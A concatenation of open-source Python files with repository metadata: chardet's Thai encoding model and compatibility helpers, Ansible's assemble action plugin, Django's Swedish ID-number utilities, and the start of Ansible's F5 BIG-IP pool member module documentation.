hkhamm/django_rest_tutorial_2
env/lib/python2.7/site-packages/pip/_vendor/requests/packages/charade/langthaimodel.py
2930
11275
######################## BEGIN LICENSE BLOCK ######################## # The Original Code is Mozilla Communicator client code. # # The Initial Developer of the Original Code is # Netscape Communications Corporation. # Portions created by the Initial Developer are Copyright (C) 1998 # the Initial Developer. All Rights Reserved. # # Contributor(s): # Mark Pilgrim - port to Python # # This library is free software; you can redistribute it and/or # modify it under the terms of the GNU Lesser General Public # License as published by the Free Software Foundation; either # version 2.1 of the License, or (at your option) any later version. # # This library is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU # Lesser General Public License for more details. # # You should have received a copy of the GNU Lesser General Public # License along with this library; if not, write to the Free Software # Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA # 02110-1301 USA ######################### END LICENSE BLOCK ######################### # 255: Control characters that usually does not exist in any text # 254: Carriage/Return # 253: symbol (punctuation) that does not belong to word # 252: 0 - 9 # The following result for thai was collected from a limited sample (1M). 
# Character Mapping Table: TIS620CharToOrderMap = ( 255,255,255,255,255,255,255,255,255,255,254,255,255,254,255,255, # 00 255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255, # 10 253,253,253,253,253,253,253,253,253,253,253,253,253,253,253,253, # 20 252,252,252,252,252,252,252,252,252,252,253,253,253,253,253,253, # 30 253,182,106,107,100,183,184,185,101, 94,186,187,108,109,110,111, # 40 188,189,190, 89, 95,112,113,191,192,193,194,253,253,253,253,253, # 50 253, 64, 72, 73,114, 74,115,116,102, 81,201,117, 90,103, 78, 82, # 60 96,202, 91, 79, 84,104,105, 97, 98, 92,203,253,253,253,253,253, # 70 209,210,211,212,213, 88,214,215,216,217,218,219,220,118,221,222, 223,224, 99, 85, 83,225,226,227,228,229,230,231,232,233,234,235, 236, 5, 30,237, 24,238, 75, 8, 26, 52, 34, 51,119, 47, 58, 57, 49, 53, 55, 43, 20, 19, 44, 14, 48, 3, 17, 25, 39, 62, 31, 54, 45, 9, 16, 2, 61, 15,239, 12, 42, 46, 18, 21, 76, 4, 66, 63, 22, 10, 1, 36, 23, 13, 40, 27, 32, 35, 86,240,241,242,243,244, 11, 28, 41, 29, 33,245, 50, 37, 6, 7, 67, 77, 38, 93,246,247, 68, 56, 59, 65, 69, 60, 70, 80, 71, 87,248,249,250,251,252,253, ) # Model Table: # total sequences: 100% # first 512 sequences: 92.6386% # first 1024 sequences:7.3177% # rest sequences: 1.0230% # negative sequences: 0.0436% ThaiLangModel = ( 0,1,3,3,3,3,0,0,3,3,0,3,3,0,3,3,3,3,3,3,3,3,0,0,3,3,3,0,3,3,3,3, 0,3,3,0,0,0,1,3,0,3,3,2,3,3,0,1,2,3,3,3,3,0,2,0,2,0,0,3,2,1,2,2, 3,0,3,3,2,3,0,0,3,3,0,3,3,0,3,3,3,3,3,3,3,3,3,0,3,2,3,0,2,2,2,3, 0,2,3,0,0,0,0,1,0,1,2,3,1,1,3,2,2,0,1,1,0,0,1,0,0,0,0,0,0,0,1,1, 3,3,3,2,3,3,3,3,3,3,3,3,3,3,3,2,2,2,2,2,2,2,3,3,2,3,2,3,3,2,2,2, 3,1,2,3,0,3,3,2,2,1,2,3,3,1,2,0,1,3,0,1,0,0,1,0,0,0,0,0,0,0,1,1, 3,3,2,2,3,3,3,3,1,2,3,3,3,3,3,2,2,2,2,3,3,2,2,3,3,2,2,3,2,3,2,2, 3,3,1,2,3,1,2,2,3,3,1,0,2,1,0,0,3,1,2,1,0,0,1,0,0,0,0,0,0,1,0,1, 3,3,3,3,3,3,2,2,3,3,3,3,2,3,2,2,3,3,2,2,3,2,2,2,2,1,1,3,1,2,1,1, 3,2,1,0,2,1,0,1,0,1,1,0,1,1,0,0,1,0,1,0,0,0,1,0,0,0,0,0,0,0,0,0, 
3,3,3,2,3,2,3,3,2,2,3,2,3,3,2,3,1,1,2,3,2,2,2,3,2,2,2,2,2,1,2,1, 2,2,1,1,3,3,2,1,0,1,2,2,0,1,3,0,0,0,1,1,0,0,0,0,0,2,3,0,0,2,1,1, 3,3,2,3,3,2,0,0,3,3,0,3,3,0,2,2,3,1,2,2,1,1,1,0,2,2,2,0,2,2,1,1, 0,2,1,0,2,0,0,2,0,1,0,0,1,0,0,0,1,1,1,1,0,0,0,0,0,0,0,0,0,0,1,0, 3,3,2,3,3,2,0,0,3,3,0,2,3,0,2,1,2,2,2,2,1,2,0,0,2,2,2,0,2,2,1,1, 0,2,1,0,2,0,0,2,0,1,1,0,1,0,0,0,0,0,0,1,0,0,1,0,0,0,0,0,0,0,0,0, 3,3,2,3,2,3,2,0,2,2,1,3,2,1,3,2,1,2,3,2,2,3,0,2,3,2,2,1,2,2,2,2, 1,2,2,0,0,0,0,2,0,1,2,0,1,1,1,0,1,0,3,1,1,0,0,0,0,0,0,0,0,0,1,0, 3,3,2,3,3,2,3,2,2,2,3,2,2,3,2,2,1,2,3,2,2,3,1,3,2,2,2,3,2,2,2,3, 3,2,1,3,0,1,1,1,0,2,1,1,1,1,1,0,1,0,1,1,0,0,0,0,0,0,0,0,0,2,0,0, 1,0,0,3,0,3,3,3,3,3,0,0,3,0,2,2,3,3,3,3,3,0,0,0,1,1,3,0,0,0,0,2, 0,0,1,0,0,0,0,0,0,0,2,3,0,0,0,3,0,2,0,0,0,0,0,3,0,0,0,0,0,0,0,0, 2,0,3,3,3,3,0,0,2,3,0,0,3,0,3,3,2,3,3,3,3,3,0,0,3,3,3,0,0,0,3,3, 0,0,3,0,0,0,0,2,0,0,2,1,1,3,0,0,1,0,0,2,3,0,1,0,0,0,0,0,0,0,1,0, 3,3,3,3,2,3,3,3,3,3,3,3,1,2,1,3,3,2,2,1,2,2,2,3,1,1,2,0,2,1,2,1, 2,2,1,0,0,0,1,1,0,1,0,1,1,0,0,0,0,0,1,1,0,0,1,0,0,0,0,0,0,0,0,0, 3,0,2,1,2,3,3,3,0,2,0,2,2,0,2,1,3,2,2,1,2,1,0,0,2,2,1,0,2,1,2,2, 0,1,1,0,0,0,0,1,0,1,1,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0, 3,3,3,3,2,1,3,3,1,1,3,0,2,3,1,1,3,2,1,1,2,0,2,2,3,2,1,1,1,1,1,2, 3,0,0,1,3,1,2,1,2,0,3,0,0,0,1,0,3,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0, 3,3,1,1,3,2,3,3,3,1,3,2,1,3,2,1,3,2,2,2,2,1,3,3,1,2,1,3,1,2,3,0, 2,1,1,3,2,2,2,1,2,1,0,0,1,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,2, 3,3,2,3,2,3,3,2,3,2,3,2,3,3,2,1,0,3,2,2,2,1,2,2,2,1,2,2,1,2,1,1, 2,2,2,3,0,1,3,1,1,1,1,0,1,1,0,2,1,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0, 3,3,3,3,2,3,2,2,1,1,3,2,3,2,3,2,0,3,2,2,1,2,0,2,2,2,1,2,2,2,2,1, 3,2,1,2,2,1,0,2,0,1,0,0,1,1,0,0,0,0,0,1,1,0,1,0,0,0,0,0,0,0,0,1, 3,3,3,3,3,2,3,1,2,3,3,2,2,3,0,1,1,2,0,3,3,2,2,3,0,1,1,3,0,0,0,0, 3,1,0,3,3,0,2,0,2,1,0,0,3,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 3,3,3,2,3,2,3,3,0,1,3,1,1,2,1,2,1,1,3,1,1,0,2,3,1,1,1,1,1,1,1,1, 3,1,1,2,2,2,2,1,1,1,0,0,2,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1, 
3,2,2,1,1,2,1,3,3,2,3,2,2,3,2,2,3,1,2,2,1,2,0,3,2,1,2,2,2,2,2,1, 3,2,1,2,2,2,1,1,1,1,0,0,1,1,0,0,0,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0, 3,3,3,3,3,3,3,3,1,3,3,0,2,1,0,3,2,0,0,3,1,0,1,1,0,1,0,0,0,0,0,1, 1,0,0,1,0,3,2,0,0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 3,0,2,2,2,3,0,0,1,3,0,3,2,0,3,2,2,3,3,3,3,3,1,0,2,2,2,0,2,2,1,2, 0,2,3,0,0,0,0,1,0,1,0,0,1,1,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1, 3,0,2,3,1,3,3,2,3,3,0,3,3,0,3,2,2,3,2,3,3,3,0,0,2,2,3,0,1,1,1,3, 0,0,3,0,0,0,2,2,0,1,3,0,1,2,2,2,3,0,0,0,0,0,1,0,0,0,0,0,0,0,0,1, 3,2,3,3,2,0,3,3,2,2,3,1,3,2,1,3,2,0,1,2,2,0,2,3,2,1,0,3,0,0,0,0, 3,0,0,2,3,1,3,0,0,3,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 3,1,3,2,2,2,1,2,0,1,3,1,1,3,1,3,0,0,2,1,1,1,1,2,1,1,1,0,2,1,0,1, 1,2,0,0,0,3,1,1,0,0,0,0,1,0,1,0,0,1,0,1,0,0,0,0,0,3,1,0,0,0,1,0, 3,3,3,3,2,2,2,2,2,1,3,1,1,1,2,0,1,1,2,1,2,1,3,2,0,0,3,1,1,1,1,1, 3,1,0,2,3,0,0,0,3,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,2,3,0,3,3,0,2,0,0,0,0,0,0,0,3,0,0,1,0,0,0,0,0,0,0,0,0,0,0, 0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,2,3,1,3,0,0,1,2,0,0,2,0,3,3,2,3,3,3,2,3,0,0,2,2,2,0,0,0,2,2, 0,0,1,0,0,0,0,3,0,0,0,0,2,0,0,0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0, 0,0,0,3,0,2,0,0,0,0,0,0,0,0,0,0,1,2,3,1,3,3,0,0,1,0,3,0,0,0,0,0, 0,0,3,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 3,3,1,2,3,1,2,3,1,0,3,0,2,2,1,0,2,1,1,2,0,1,0,0,1,1,1,1,0,1,0,0, 1,0,0,0,0,1,1,0,3,0,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 3,3,3,3,2,1,0,1,1,1,3,1,2,2,2,2,2,2,1,1,1,1,0,3,1,0,1,3,1,1,1,1, 1,1,0,2,0,1,3,1,1,0,0,1,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,2,0,1, 3,0,2,2,1,3,3,2,3,3,0,1,1,0,2,2,1,2,1,3,3,1,0,0,3,2,0,0,0,0,2,1, 0,1,0,0,0,0,1,2,0,1,1,3,1,1,2,2,1,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0, 0,0,3,0,0,1,0,0,0,3,0,0,3,0,3,1,0,1,1,1,3,2,0,0,0,3,0,0,0,0,2,0, 0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,2,0,0,0,0,0,0,0,0,0, 3,3,1,3,2,1,3,3,1,2,2,0,1,2,1,0,1,2,0,0,0,0,0,3,0,0,0,3,0,0,0,0, 3,0,0,1,1,1,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 
3,0,1,2,0,3,3,3,2,2,0,1,1,0,1,3,0,0,0,2,2,0,0,0,0,3,1,0,1,0,0,0, 0,0,0,0,0,0,0,0,0,1,0,1,0,0,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 3,0,2,3,1,2,0,0,2,1,0,3,1,0,1,2,0,1,1,1,1,3,0,0,3,1,1,0,2,2,1,1, 0,2,0,0,0,0,0,1,0,1,0,0,1,1,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 3,0,0,3,1,2,0,0,2,2,0,1,2,0,1,0,1,3,1,2,1,0,0,0,2,0,3,0,0,0,1,0, 0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 3,0,1,1,2,2,0,0,0,2,0,2,1,0,1,1,0,1,1,1,2,1,0,0,1,1,1,0,2,1,1,1, 0,1,1,0,0,0,0,0,0,1,0,0,1,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,1,0,1, 0,0,0,2,0,1,3,1,1,1,1,0,0,0,0,3,2,0,1,0,0,0,1,2,0,0,0,1,0,0,0,0, 0,0,0,3,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,3,3,3,3,1,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 1,0,2,3,2,2,0,0,0,1,0,0,0,0,2,3,2,1,2,2,3,0,0,0,2,3,1,0,0,0,1,1, 0,0,1,0,0,0,0,0,0,0,1,0,0,1,0,0,0,0,0,1,1,0,1,0,0,0,0,0,0,0,0,0, 3,3,2,2,0,1,0,0,0,0,2,0,2,0,1,0,0,0,1,1,0,0,0,2,1,0,1,0,1,1,0,0, 0,1,0,2,0,0,1,0,3,0,1,0,0,0,2,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 3,3,1,0,0,1,0,0,0,0,0,1,1,2,0,0,0,0,1,0,0,1,3,1,0,0,0,0,1,1,0,0, 0,1,0,0,0,0,3,0,0,0,0,0,0,3,0,0,0,0,0,0,0,3,0,0,0,0,0,0,0,0,0,0, 3,3,1,1,1,1,2,3,0,0,2,1,1,1,1,1,0,2,1,1,0,0,0,2,1,0,1,2,1,1,0,1, 2,1,0,3,0,0,0,0,3,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 1,3,1,0,0,0,0,0,0,0,3,0,0,0,3,0,0,0,0,0,0,0,0,1,1,0,0,0,0,0,0,1, 0,0,0,2,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 3,3,2,0,0,0,0,0,0,1,2,1,0,1,1,0,2,0,0,1,0,0,2,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,2,0,0,0,1,3,0,1,0,0,0,2,0,0,0,0,0,0,0,1,2,0,0,0,0,0, 3,3,0,0,1,1,2,0,0,1,2,1,0,1,1,1,0,1,1,0,0,2,1,1,0,1,0,0,1,1,1,0, 0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,3,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0, 2,2,2,1,0,0,0,0,1,0,0,0,0,3,0,0,0,0,0,0,0,0,0,3,0,0,0,0,0,0,0,0, 2,0,0,0,0,0,3,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 2,3,0,0,1,1,0,0,0,2,0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,1,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 
3,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 1,1,0,1,2,0,1,2,0,0,1,1,0,2,0,1,0,0,1,0,0,0,0,1,0,0,0,2,0,0,0,0, 1,0,0,1,0,1,1,0,3,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,1,0,0,0,0,0,0,0,1,1,0,1,1,0,2,1,3,0,0,0,0,1,1,0,0,0,0,0,0,0,3, 1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,3,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 2,0,1,0,1,0,0,2,0,0,2,0,0,1,1,2,0,0,1,1,0,0,0,1,0,0,0,1,1,0,0,0, 1,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0, 1,0,0,3,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,1, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 3,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,2,0,0,1,1,0,0,0, 2,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,3,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 2,0,0,0,0,2,0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,1,0,1,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,1,3,0,0,0, 2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,2,0,0,1,0,0,0,0, 1,0,0,0,0,0,0,0,0,1,0,0,0,0,2,0,0,0,0,2,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,1,1,0,0,2,1,0,0,1,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, ) TIS620ThaiModel = { 'charToOrderMap': TIS620CharToOrderMap, 'precedenceMatrix': ThaiLangModel, 'mTypicalPositiveRatio': 0.926386, 'keepEnglishLetter': False, 'charsetName': 
"TIS-620" } # flake8: noqa
mit
ehashman/oh-mainline
vendor/packages/requests/requests/packages/chardet/compat.py
2943
1157
######################## BEGIN LICENSE BLOCK ########################
# Contributor(s):
#   Ian Cordasco - port to Python
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA
# 02110-1301  USA
######################### END LICENSE BLOCK #########################

import sys

# The pair of "string-like" types differs between major versions: Python 2
# code may hand us either ``str`` or ``unicode``; on Python 3 the analogous
# pair is ``bytes``/``str``.
if sys.version_info < (3, 0):
    base_str = (str, unicode)
else:
    base_str = (bytes, str)


def wrap_ord(a):
    """Return the ordinal of *a* on Python 2 string input, else *a* as-is.

    On Python 2, iterating a byte string yields length-1 strings that must
    be converted with ord(); on Python 3 iteration already yields ints, so
    the value passes through unchanged.
    """
    needs_ord = sys.version_info < (3, 0) and isinstance(a, base_str)
    return ord(a) if needs_ord else a
agpl-3.0
tedder/ansible
lib/ansible/plugins/action/assemble.py
60
6409
# (c) 2013-2016, Michael DeHaan <michael.dehaan@gmail.com> # Stephen Fromm <sfromm@gmail.com> # Brian Coca <briancoca+dev@gmail.com> # Toshio Kuratomi <tkuratomi@ansible.com> # # This file is part of Ansible # # Ansible is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # # Ansible is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License from __future__ import (absolute_import, division, print_function) __metaclass__ = type import codecs import os import os.path import re import tempfile from ansible import constants as C from ansible.errors import AnsibleError, AnsibleAction, _AnsibleActionDone, AnsibleActionFail from ansible.module_utils._text import to_native, to_text from ansible.module_utils.parsing.convert_bool import boolean from ansible.plugins.action import ActionBase from ansible.utils.hashing import checksum_s class ActionModule(ActionBase): TRANSFERS_FILES = True def _assemble_from_fragments(self, src_path, delimiter=None, compiled_regexp=None, ignore_hidden=False, decrypt=True): ''' assemble a file from a directory of fragments ''' tmpfd, temp_path = tempfile.mkstemp(dir=C.DEFAULT_LOCAL_TMP) tmp = os.fdopen(tmpfd, 'wb') delimit_me = False add_newline = False for f in (to_text(p, errors='surrogate_or_strict') for p in sorted(os.listdir(src_path))): if compiled_regexp and not compiled_regexp.search(f): continue fragment = u"%s/%s" % (src_path, f) if not os.path.isfile(fragment) or (ignore_hidden and os.path.basename(fragment).startswith('.')): continue with open(self._loader.get_real_file(fragment, decrypt=decrypt), 'rb') as fragment_fh: 
fragment_content = fragment_fh.read() # always put a newline between fragments if the previous fragment didn't end with a newline. if add_newline: tmp.write(b'\n') # delimiters should only appear between fragments if delimit_me: if delimiter: # un-escape anything like newlines delimiter = codecs.escape_decode(delimiter)[0] tmp.write(delimiter) # always make sure there's a newline after the # delimiter, so lines don't run together if delimiter[-1] != b'\n': tmp.write(b'\n') tmp.write(fragment_content) delimit_me = True if fragment_content.endswith(b'\n'): add_newline = False else: add_newline = True tmp.close() return temp_path def run(self, tmp=None, task_vars=None): self._supports_check_mode = False result = super(ActionModule, self).run(tmp, task_vars) del tmp # tmp no longer has any effect if task_vars is None: task_vars = dict() src = self._task.args.get('src', None) dest = self._task.args.get('dest', None) delimiter = self._task.args.get('delimiter', None) remote_src = self._task.args.get('remote_src', 'yes') regexp = self._task.args.get('regexp', None) follow = self._task.args.get('follow', False) ignore_hidden = self._task.args.get('ignore_hidden', False) decrypt = self._task.args.get('decrypt', True) try: if src is None or dest is None: raise AnsibleActionFail("src and dest are required") if boolean(remote_src, strict=False): result.update(self._execute_module(module_name='assemble', task_vars=task_vars)) raise _AnsibleActionDone() else: try: src = self._find_needle('files', src) except AnsibleError as e: raise AnsibleActionFail(to_native(e)) if not os.path.isdir(src): raise AnsibleActionFail(u"Source (%s) is not a directory" % src) _re = None if regexp is not None: _re = re.compile(regexp) # Does all work assembling the file path = self._assemble_from_fragments(src, delimiter, _re, ignore_hidden, decrypt) path_checksum = checksum_s(path) dest = self._remote_expand_user(dest) dest_stat = self._execute_remote_stat(dest, all_vars=task_vars, follow=follow) 
diff = {} # setup args for running modules new_module_args = self._task.args.copy() # clean assemble specific options for opt in ['remote_src', 'regexp', 'delimiter', 'ignore_hidden', 'decrypt']: if opt in new_module_args: del new_module_args[opt] new_module_args['dest'] = dest if path_checksum != dest_stat['checksum']: if self._play_context.diff: diff = self._get_diff_data(dest, path, task_vars) remote_path = self._connection._shell.join_path(self._connection._shell.tmpdir, 'src') xfered = self._transfer_file(path, remote_path) # fix file permissions when the copy is done as a different user self._fixup_perms2((self._connection._shell.tmpdir, remote_path)) new_module_args.update(dict(src=xfered,)) res = self._execute_module(module_name='copy', module_args=new_module_args, task_vars=task_vars) if diff: res['diff'] = diff result.update(res) else: result.update(self._execute_module(module_name='file', module_args=new_module_args, task_vars=task_vars)) except AnsibleAction as e: result.update(e.result) finally: self._remove_tmp_path(self._connection._shell.tmpdir) return result
gpl-3.0
alx-eu/django
django/contrib/localflavor/se/utils.py
104
2430
import datetime

from django.utils import six


def id_number_checksum(gd):
    """
    Calculates a Swedish ID number checksum, using the "Luhn"-algoritm
    """
    # gd is a regex group-dict with string digit fields: 'year', 'month',
    # 'day', 'serial' (plus 'century'/'sign'/'checksum' used elsewhere).
    n = s = 0
    for c in (gd['year'] + gd['month'] + gd['day'] + gd['serial']):
        # Luhn weighting: positions alternate 2,1,2,1,... starting with 2.
        tmp = ((n % 2) and 1 or 2) * int(c)

        if tmp > 9:
            # Two-digit products contribute the sum of their digits.
            tmp = sum([int(i) for i in str(tmp)])

        s += tmp
        n += 1

    if (s % 10) == 0:
        return 0

    # Distance from s up to the next multiple of ten.
    return (((s // 10) + 1) * 10) - s


def validate_id_birthday(gd, fix_coordination_number_day=True):
    """
    Validates the birth_day and returns the datetime.date object for the
    birth_day.

    If the date is an invalid birth day, a ValueError will be raised.
    """
    today = datetime.date.today()

    day = int(gd['day'])
    if fix_coordination_number_day and day > 60:
        # Coordination numbers ("samordningsnummer") encode day + 60.
        day -= 60

    if gd['century'] is None:
        # The century was not specified, and need to be calculated from todays date
        # NOTE(review): current_year is assigned but never used below — confirm
        # whether it can be dropped.
        current_year = today.year
        year = int(today.strftime('%Y')) - int(today.strftime('%y')) + int(gd['year'])

        # If the two-digit birth date would land in the future, the person
        # must have been born in the previous century.
        if ('%s%s%02d' % (gd['year'], gd['month'], day)) > today.strftime('%y%m%d'):
            year -= 100

        # If the person is older than 100 years
        if gd['sign'] == '+':
            year -= 100
    else:
        year = int(gd['century'] + gd['year'])

        # Make sure the year is valid
        # There are no swedish personal identity numbers where year < 1800
        if year < 1800:
            raise ValueError

    # ValueError will be raise for invalid dates
    birth_day = datetime.date(year, int(gd['month']), day)

    # birth_day must not be in the future
    if birth_day > today:
        raise ValueError

    return birth_day


def format_personal_id_number(birth_day, gd):
    # birth_day.strftime cannot be used, since it does not support dates < 1900
    return six.text_type(str(birth_day.year) + gd['month'] + gd['day'] + gd['serial'] + gd['checksum'])


def format_organisation_number(gd):
    # Organisation numbers may omit the century prefix entirely.
    if gd['century'] is None:
        century = ''
    else:
        century = gd['century']

    return six.text_type(century + gd['year'] + gd['month'] + gd['day'] + gd['serial'] + gd['checksum'])


def valid_organisation(gd):
    # An organisation number has month >= 20, no '+' sign, and a first
    # "year" digit identifying the organisation group.
    # NOTE(review): gd['century'] is used as a *string* in the formatters
    # above, yet here it is compared against the int 16 — that comparison
    # can only ever match None. Confirm whether this should be '16'.
    return gd['century'] in (None, 16) and \
        int(gd['month']) >= 20 and \
        gd['sign'] in (None, '-') and \
        gd['year'][0] in ('2', '5', '7', '8', '9')  # group identifier
bsd-3-clause
alvaroaleman/ansible
lib/ansible/modules/network/f5/bigip_pool_member.py
21
16787
#!/usr/bin/python # -*- coding: utf-8 -*- # # (c) 2013, Matt Hite <mhite@hotmail.com> # # This file is part of Ansible # # Ansible is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # # Ansible is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with Ansible. If not, see <http://www.gnu.org/licenses/>. ANSIBLE_METADATA = {'status': ['preview'], 'supported_by': 'community', 'version': '1.0'} DOCUMENTATION = ''' --- module: bigip_pool_member short_description: Manages F5 BIG-IP LTM pool members description: - Manages F5 BIG-IP LTM pool members via iControl SOAP API version_added: 1.4 author: - Matt Hite (@mhite) - Tim Rupp (@caphrim007) notes: - Requires BIG-IP software version >= 11 - F5 developed module 'bigsuds' required (see http://devcentral.f5.com) - Best run as a local_action in your playbook - Supersedes bigip_pool for managing pool members requirements: - bigsuds options: state: description: - Pool member state required: true default: present choices: - present - absent session_state: description: - Set new session availability status for pool member version_added: 2.0 required: false default: null choices: - enabled - disabled monitor_state: description: - Set monitor availability status for pool member version_added: 2.0 required: false default: null choices: - enabled - disabled pool: description: - Pool name. This pool must exist. 
required: true partition: description: - Partition required: false default: 'Common' host: description: - Pool member IP required: true aliases: - address - name port: description: - Pool member port required: true connection_limit: description: - Pool member connection limit. Setting this to 0 disables the limit. required: false default: null description: description: - Pool member description required: false default: null rate_limit: description: - Pool member rate limit (connections-per-second). Setting this to 0 disables the limit. required: false default: null ratio: description: - Pool member ratio weight. Valid values range from 1 through 100. New pool members -- unless overridden with this value -- default to 1. required: false default: null preserve_node: description: - When state is absent and the pool member is no longer referenced in other pools, the default behavior removes the unused node o bject. Setting this to 'yes' disables this behavior. required: false default: 'no' choices: - yes - no version_added: 2.1 extends_documentation_fragment: f5 ''' EXAMPLES = ''' - name: Add pool member bigip_pool_member: server: "lb.mydomain.com" user: "admin" password: "secret" state: "present" pool: "my-pool" partition: "Common" host: "{{ ansible_default_ipv4["address"] }}" port: 80 